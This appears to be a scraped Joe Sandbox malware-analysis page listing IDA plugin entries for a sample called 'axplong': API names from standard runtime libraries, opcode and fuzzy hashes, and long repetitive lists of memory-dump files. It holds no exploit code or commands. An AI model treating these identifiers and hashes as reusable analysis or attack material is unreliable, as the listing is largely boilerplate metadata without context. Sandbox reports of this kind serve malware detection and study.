                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                    • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                                    • Opcode ID: 52b3dd06bfd7f695c250d308113c69be39909047bb5215bf4ef4f7a331c6bc36
                                                                                                                                                                                                                                                    • Instruction ID: f64d93b600b7fe372634ac775ef0909307df1556ba2801ca44fbae38837b68dd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52b3dd06bfd7f695c250d308113c69be39909047bb5215bf4ef4f7a331c6bc36
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF219839600205EFCF14EFA8C892EAD77AAFF49300F00406DE5069BA91DF71AE02CB55
                                                                                                                                                                                                                                                    Function 00696D4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SafeRWList.LIBCONCRT ref: 00696DA3
                                                                                                                                                                                                                                                      • Part of subcall function 00694D9E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00694DAF
                                                                                                                                                                                                                                                      • Part of subcall function 00694D9E: List.LIBCMT ref: 00694DB9
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00696DB5
                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00696DDA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: eventObject
                                                                                                                                                                                                                                                    • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                                    • Opcode ID: d4f95f897deabbac17b9b5998c7c698a7d314bae4b270726da02c2bac4c9e4b8
                                                                                                                                                                                                                                                    • Instruction ID: 7c1be88d4ddbcccddfb724e5a21ec4720798d30df4d2a582c311bdcf10af7790
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4f95f897deabbac17b9b5998c7c698a7d314bae4b270726da02c2bac4c9e4b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67114870640308EAEF24FBA4CD46FFE736D5F00358F60011AF515A65C1EB709A08C6B5
                                                                                                                                                                                                                                                    Function 0069A01E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0069A032
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0069A056
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0069A069
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pScheduler
                                                                                                                                                                                                                                                    • API String ID: 246774199-923244539
                                                                                                                                                                                                                                                    • Opcode ID: be413840f74de2c651d2c0b2f92d92735dec06398d33d123663d271bd81d358d
                                                                                                                                                                                                                                                    • Instruction ID: 4946c1bb10a09e038b1d6b2b89b755276ee38b733218989751f99537e569c1b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be413840f74de2c651d2c0b2f92d92735dec06398d33d123663d271bd81d358d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F05936900214A7CF20F684D882CAEB3BF9E81B68720411EE40113B82DF71AE06C6D7
                                                                                                                                                                                                                                                    Function 00672AF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672B23
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g$This function cannot be called on a default constructed task
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1301039920
                                                                                                                                                                                                                                                    • Opcode ID: 1825add6a801712602529dd539bc39de6818ba4eed5d2446be8dd41dff581771
                                                                                                                                                                                                                                                    • Instruction ID: 5e74860bde90610b2c0a0697feead42fc9faa1c95deff9fba99442193fe773f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1825add6a801712602529dd539bc39de6818ba4eed5d2446be8dd41dff581771
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0A770D1020C9FC710DF689841AAEFBFADF16300F5042AEF84067301EB715A548BA9
                                                                                                                                                                                                                                                    Function 006A4F7E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
